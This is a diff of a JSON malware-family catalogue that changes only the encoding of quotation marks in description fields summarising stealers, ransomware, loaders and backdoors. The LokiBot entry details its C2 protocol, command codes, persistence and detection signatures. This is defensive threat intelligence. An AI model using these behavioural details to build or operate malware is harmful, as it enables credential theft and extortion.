+ "description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which they named LATENTBOT – caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot",
@@ -32618,7 +32618,7 @@
 "value": "LightNeuron"
 },
 {
- "description": "Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user\u2019s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration. ",
+ "description": "Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user’s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightning_stealer",
@@ -33111,7 +33111,7 @@
 "value": "LockPOS"
 },
 {
- "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.",
+ "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda",
@@ -33236,7 +33236,7 @@
 "value": "LokiLocker"
 },
 {
- "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2",
+ "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws",
@@ -33353,7 +33353,7 @@
 "value": "LONGWATCH"
 },
 {
- "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term \u201cCipher\u201d) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ",
+ "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper"
@@ -33520,7 +33520,7 @@
 "value": "lsassDumper"
 },
 {
- "description": "According to PCrisk, Lu0bot es un software malicioso. El malware es ligero, por lo que su uso de los recursos del sistema es bajo. Esto complica la detecci\u00f3n de Lu0bot, ya que no causa s\u00edntomas significativos, como una grave disminuci\u00f3n del rendimiento del sistema.\r\n\r\nEl programa malicioso funciona como un recolector de telemetr\u00eda. ",
+ "description": "According to PCrisk, Lu0bot es un software malicioso. El malware es ligero, por lo que su uso de los recursos del sistema es bajo. Esto complica la detección de Lu0bot, ya que no causa síntomas significativos, como una grave disminución del rendimiento del sistema.\r\n\r\nEl programa malicioso funciona como un recolector de telemetría. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lu0bot",
@@ -33749,7 +33749,7 @@ "value": "Macaw" }, { - "description": "According to ESET, Machete\u2019s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64\u2011encoded text that corresponds to AES\u2011encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it\u2019s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.", + "description": "According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64‑encoded text that corresponds to AES‑encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. 
In short, this application provides geolocation coordinates when it’s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", @@ -33997,7 +33997,7 @@ "value": "MakLoader" }, { - "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension \u201c.makop\u201d. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", + "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop", 
@@ -34014,7 +34014,7 @@ "value": "Makop" }, { - "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension \u201c.makop\u201d. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", + "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware", @@ -34982,7 +34982,7 @@ "value": "Metamorfo" }, { - "description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META \u2013 a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.", + "description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META – a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer", 
@@ -35602,7 +35602,7 @@ "value": "Mirai (Windows)" }, { - "description": "According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users\u2019 browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously. Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.", + "description": "According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users’ browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously. Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast", @@ -35674,7 +35674,7 @@ "value": "Misha" }, { - "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald\u2019s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.", + "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu", 
@@ -35816,7 +35816,7 @@ "value": "MoDi RAT" }, { - "description": "ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS \u2013 a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them \u2013 named GetMicInfo \u2013 contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions. ", + "description": "ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS – a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them – named GetMicInfo – contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe", 
@@ -36156,7 +36156,7 @@ "value": "Mosquito" }, { - "description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim\u2019s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.", + "description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim’s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker", 
@@ -39017,7 +39017,7 @@ "value": "Peppy RAT" }, { - "description": "The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim\u2019s machine. What\u2019s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.", + "description": "The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim’s machine. What’s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", 
@@ -39381,7 +39381,7 @@ "value": "PILLOWMINT" }, { - "description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke\u2019s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.", + "description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke’s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke", @@ -40287,7 +40287,7 @@ "value": "Poulight Stealer" }, { - "description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to \u201csecurely\u201d test the ransomware protection capabilities of security vendor products.", + "description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware", 
@@ -40869,7 +40869,7 @@ "value": "pupy (Windows)" }, { - "description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google\u2019s Protocol Buffer message format ", + "description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google’s Protocol Buffer message format ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter", 
@@ -40931,7 +40931,7 @@ "value": "PurpleFox" }, { - "description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user\u2019s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.", + "description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user’s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave", @@ -42230,7 +42230,7 @@ "value": "Rarog" }, { - "description": "This ransomware encrypts all user\u2019s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.", + "description": "This ransomware encrypts all user’s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", 
@@ -45008,7 +45008,7 @@ "value": "Satan" }, { - "description": "According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer\u2019s master boot record (MBR) and prevents it from starting.", + "description": "According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer’s master boot record (MBR) and prevents it from starting.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", @@ -45764,7 +45764,7 @@ "value": "SharpMapExec" }, { - "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called \u201cStage_One\u201d. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ", + "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called “Stage_One”. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage", 
@@ -46991,7 +46991,7 @@ "value": "Solarbot" }, { - "description": "Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.\r\n\r\nSome of SolarMarker\u2019s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims\u2019 web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.\r\n\r\nThe malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.", + "description": "Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.\r\n\r\nSome of SolarMarker’s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims’ web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.\r\n\r\nThe malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker", 
@@ -47421,7 +47421,7 @@ "value": "SpyEye" }, { - "description": "According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim\u2019s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.", + "description": "According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim’s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle", 
@@ -47650,7 +47650,7 @@ "value": "Stealc" }, { - "description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor\u2019s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.", + "description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor’s addresses if the victim makes a transaction. 
The stolen information is sent to a Discord channel using a Discord Webhook.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium", @@ -47678,7 +47678,7 @@ "value": "Stealer0x3401" }, { - "description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target\u2019s backend. Hacker\u2019s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target\u2019s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.", + "description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target’s backend. Hacker’s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target’s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker", 
